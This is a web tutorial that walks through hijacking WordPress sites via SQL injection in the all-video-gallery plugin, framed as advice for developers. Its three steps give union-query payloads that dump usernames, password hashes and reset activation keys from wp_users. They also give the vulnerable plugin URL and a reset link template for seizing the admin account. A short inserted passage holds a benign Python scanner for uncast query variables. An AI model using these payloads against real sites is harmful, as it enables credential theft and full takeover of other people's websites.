How to Hack WordPress Site Using SQL Injection

HACK WORDPRESS SITE USING SQL INJECTION: First of all, my intention isn't to teach how to hack other people's WordPress sites and destroy their hard work. This is a guide for WordPress developers who are new to coding or don't know about the vulnerabilities that may exist in the plugins they use, so they can avoid coding mistakes. The method is divided into three steps.

STEP 1 – Find out Vulnerabilities in WordPress Website – Hack WordPress site

If your site has been hacked, or you want to make sure nobody can hack it, you should review the plugin files and their code. Somewhere the code may be using SQL queries without awareness of SQL injection, which is the route used to hack a WordPress site. If that is the case, the hacker can use a union query to read all the rows of the wp_users table. Below is an example query that fetches all WordPress users with a union query in order to learn the email addresses of all users.

-1 union Select 1,2,3,4,5,6,group_concat(user_login,----,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

What the hacker is doing here is finding out the administrator's email; for this, he uses a union query.

A few months ago, the all-video-gallery plugin had a vulnerability in config.php because of the following code.

"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid

In this query, the plugin developer used the $_pid variable directly in the query without any typecasting.
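One way to carry out the plugin review described in Step 1, as an added example (not code from the original post or from the plugin): a small heuristic Python scanner that flags SQL strings concatenated with a variable that was never cast to an integer. The function name, the regexes and the sample PHP are constructed for illustration; the first sample query is the line quoted above, and the other two show the typecast and `$wpdb->prepare()` forms, which are not flagged.

```python
import re

# A string literal that starts an SQL statement.
SQL_IN_STRING = re.compile(r"""["']\s*(?:SELECT|INSERT|UPDATE|DELETE)\b""", re.I)
# A bare variable concatenated onto a string: "... id=" . $var ($wpdb->prefix is skipped).
RAW_CONCAT = re.compile(r"""["']\s*\.\s*(\$(?!wpdb\b)\w+)""")
# A plain assignment "$var = <expr>" (not a "==" comparison).
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=(?!=)\s*(.*)")
# Right-hand sides that force the value to an integer.
INT_CAST = re.compile(r"^(?:intval\s*\(|absint\s*\(|\(\s*int\s*\))")


def find_unsafe_queries(php_source):
    """Return [(line_no, variable)] for SQL strings built from uncast variables."""
    int_vars, findings = set(), []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        assign = ASSIGN.match(line)
        if assign:
            var, rhs = assign.groups()
            if INT_CAST.match(rhs):
                int_vars.add(var)      # typecast: usable as a numeric id
            else:
                int_vars.discard(var)  # reassigned from something untyped
        if not SQL_IN_STRING.search(line):
            continue
        for var in RAW_CONCAT.findall(line):
            if var not in int_vars:
                findings.append((line_no, var))
    return findings


# Constructed sample input: the query from the page, then two hardened variants.
SAMPLE_PHP = r'''<?php
$_pid = $_GET['pid'];
$q1 = "SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid;
$_pid = intval($_GET['pid']);
$q2 = "SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=".$_pid;
$q3 = $wpdb->prepare("SELECT * FROM {$wpdb->prefix}allvideogallery_profiles WHERE id=%d", $_GET['pid']);
'''

if __name__ == "__main__":
    for line_no, var in find_unsafe_queries(SAMPLE_PHP):
        print(f"line {line_no}: {var} reaches an SQL string without a typecast")
```

The scanner is line-based and only tracks integer casts, so treat a hit as a pointer for manual review rather than proof of a vulnerability.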


So a hacker could pass this union query through the pid parameter in the URL, like this.

http://{Domain_Name_Here}/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=11&pid={union Query here}

If you append that union query to this query, it becomes the following.

"SELECT * FROM ".$wpdb->prefix."allvideogallery_profiles WHERE id=-1 union Select 1,2,3,4,5,6,group_concat(user_login,0xa,user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

The output of this file is an XML file.


STEP 2 – Reset WordPress Password and Get Activation Key – Hack WordPress site

Next, they'll try to reset your password using the admin's email. For this, they'll go to the login page and click the Lost Your Password link. At this point, a new activation code is emailed to the admin's email address, and the hacker gets this activation code using the following query.

-1 union Select 1,2,3,4,5,6,group_concat(user_login,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,262,7,28,29,30,31,32,33,34,35,36,37,38,39,40 from wp_users

Again, they will pass this union query the same way as in the previous step.

The output of this file is an XML file, as below.

[Figure: XML output after resetting the WordPress password and getting the activation key]

STEP 3 – Use Activation key and Reset Password – Hack WordPress site

This is the last step, where he actually resets your password and gets full control of your WordPress website.

In this step, he uses the activation key to reset the password by following this link: HTTP://{DOMAIN_NAME_HERE}/wp-login.php?action=rp&key={ACTIVATION_KEY_HERE}&login={USERNAME_HERE}

In the end, the hacker can get into your WordPress site and have full control over it. Typically they insert malicious code into your files or modify a plugin file so that it becomes a WordPress backdoor for hacking your site again.

